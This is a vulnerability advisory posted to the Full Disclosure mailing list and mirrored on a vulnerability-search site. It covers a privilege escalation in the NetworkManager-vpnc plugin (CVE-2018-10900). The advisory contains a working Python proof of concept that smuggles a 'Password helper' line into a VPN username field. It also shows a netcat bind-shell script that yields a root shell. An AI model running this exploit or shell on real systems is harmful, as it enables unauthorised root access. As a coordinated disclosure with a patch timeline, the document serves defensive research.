Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Related Vulnerabilities: CVE-2018-10900  
Source 
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="75"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#76">By Date</a>
<a href="77"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="75"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#76">By Thread</a>
<a href="77"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">Network Manager VPNC - Privilege Escalation (CVE-2018-10900)</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: Denis Andzakovic via Fulldisclosure &lt;fulldisclosure () seclists org&gt;


<em>Date</em>: Mon, 23 Jul 2018 16:58:33 +1200


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Release URL: <a rel="nofollow" href="https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc">https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc</a>
Date Released: 21/07/2018  
CVE: CVE-2018-10900
Author: Denis Andzakovic  
Source: <a rel="nofollow" href="https://gitlab.gnome.org/GNOME/NetworkManager-vpnc">https://gitlab.gnome.org/GNOME/NetworkManager-vpnc</a>  
Affected Software: Network Manager VPNC – 1.2.4  

--[ Description
The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A new line character can be used to 
inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute 
arbitrary commands as root. 

--[ Privilege Escalation

When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By 
injecting a \n character into a configuration parameter, an attacker can coerce Network Manager to set the Password 
helper option to an attacker controlled executable file.

The following python script generates a VPNC connection which will execute the /tmp/test file when connected. The new 
line character is injected into the Xauth username parameter.

import dbus
con = {
    'vpn':{
        'service-type':'org.freedesktop.NetworkManager.vpnc',
        'data':{
            'IKE DH Group':'dh2',
            'IPSec ID':'testgroup',
            'IPSec gateway':'gateway',
            'IPSec secret-flags':'4',
            'Local Port':'0',
            'NAT Traversal Mode': 'natt',
            'Perfect Forward Secrecy': 'server',
            'Vendor': 'cisco',
            'Xauth password-flags': '4',
            'Xauth username': "username\nPassword helper /tmp/test",
            'ipsec-secret-type': 'unused',
            'xauth-password-type': 'unused'
            }
    },
    'connection':{
        'type':'vpn',
        'id':'vpnc_test',
    },
    'ipv4':{'method':'auto'},
    'ipv6':{'method':'auto'}
}
bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)

The above results in the following configuration being passed to the vpnc process when the connection is initialized:  

Debug 0
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950  --bus-name 
org.freedesktop.NetworkManager.vpnc.Connection_4
Cisco UDP Encapsulation Port 0
Local Port 0
IKE DH Group dh2
Perfect Forward Secrecy server
Xauth username username
Password helper /tmp/test
IPSec gateway gateway
IPSec ID testgroup
Vendor cisco
NAT Traversal Mode natt

The following figure details the complete privilege escalation attack.

doi@ubuntu:~$ cat &lt;&lt; EOF &gt; /tmp/test
</pre><blockquote style="border-left: #5555EE solid 0.2em; margin: 0em; padding-left: 0.85em"><pre style="margin: 0em;">#!/bin/bash
mkfifo pipe
nc -k -l -p 8080 &lt; pipe | /bin/bash &gt; pipe
EOF
</pre></blockquote><pre style="margin: 0em;">doi@ubuntu:~$ python vpnc_privesc.py
doi@ubuntu:~$ nmcli connection
NAME                UUID                                  TYPE      DEVICE
Wired connection 1  a8b178fd-8cbc-3e15-aa9e-d52982215d98  ethernet  ens3
vpnc_test           233101cb-f786-44ed-9e4f-662f1a519429  vpn       ens3
doi@ubuntu:~$ nmcli connection up vpnc_test

^Z
[1]+  Stopped                 nmcli connection up vpnc_test
doi@ubuntu:~$ nc -vv 127.0.0.1 8080
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)

--[ Timeline

11/07/2018 - Advisory sent to security () gnome org  
13/07/2018 - Acknowledgement from Gnome security  
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day  
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released

--[  About Pulse Security
Pulse Security is a specialist offensive security consultancy dedicated to providing best in breed security testing and 
review services.

W: <a rel="nofollow" href="https://pulsesecurity.co.nz">https://pulsesecurity.co.nz</a>
E: info at pulsesecurity.co.nz


_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="75"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#76">By Date</a>
<a href="77"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="75"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#76">By Thread</a>
<a href="77"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>Network Manager VPNC - Privilege Escalation (CVE-2018-10900)</strong> <em>Denis Andzakovic via Fulldisclosure (Jul 22)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started